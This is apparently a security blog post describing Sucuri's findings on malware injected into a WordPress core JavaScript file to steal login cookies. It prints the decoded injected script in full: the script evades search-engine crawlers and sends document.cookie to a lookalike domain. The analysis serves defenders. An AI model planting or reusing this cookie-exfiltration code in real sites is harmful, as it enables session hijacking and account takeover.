Malware sending WordPress Cookies to fake WordPressAPI

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon

Malware sending WordPress Cookies to fake WordPressAPI

Malware sending WordPress Cookies to fake WordPressAPI. Sucuri researchers warned that the “code.wordprssapi.com” website was recently used to steal WordPress cookies and hijack sessions. Attackers can steal active cookies, pretend to be that user and perform any actions the user has permissions to make.

A cookie is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added to the shopping cart in an online store) or to record the user’s browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past).

Related  Android Default Browsers Allow Attackers To Steel Session – Vulnerability

Also, Attackers used a website name that is not suspicious and seems to be a legitimate WordPress site (wordprssapi.com). This is extremely dangerous when considering administrator users. Malware sending WordPress Cookies to fake WordPressAPI.

Hackers used a WordPress core file ( wp-includes/js/hoverIntent.min.js.) to inject a malicious code that used typical eval(function(p, a,c,k,e,d) obfuscation at the bottom of the JavaScript file.

Malware sending WordPress Cookies to fake WordPressAPI.

Sucuri researchers decoded the code and found the following:

function adsadsgg() {
  var gd = document.cookie.indexOf("_utmzz=");
  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    	var rd = Math.floor(Math.random() * 2);
    	if (rd == 0) {
        	var sss = document.createElement('script');
        	sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
        	document.body.appendChild(sss)
    	}
    	var dd = new Date();
    	dd.setTime(dd.getTime() + 86400000);
    	window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
  }
}
if (typeof(jQuery) != 'undefined') {
  jQuery(function() {
    	adsadsgg()
  })
} else {
  window.onload = function() {
    	adsadsgg()
  }
}

In addition, The hackers used a conditional statement at the top of the code that excludes cookies from user agents that are coming from search engine spiders and this guarantees that the information that sent to attackers is more likely to be usable immediately. Malware sending WordPress Cookies to fake WordPressAPI.
The injected code then gathers the current cookie data and sends it to the malicious website (code.wordprssapi.com) to be used by attackers.

ALSO READ  Google News Creation Software 2017

To conclude, Attackers are using tricks to evade detection by webmasters. Webmasters can prevent falling victims to such attacks by paying close attention to the code when reviewing it. Be careful and always check that a domain is legitimate. Malware Steal WordPress Cookies and sending it to fake WordPressAPI

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon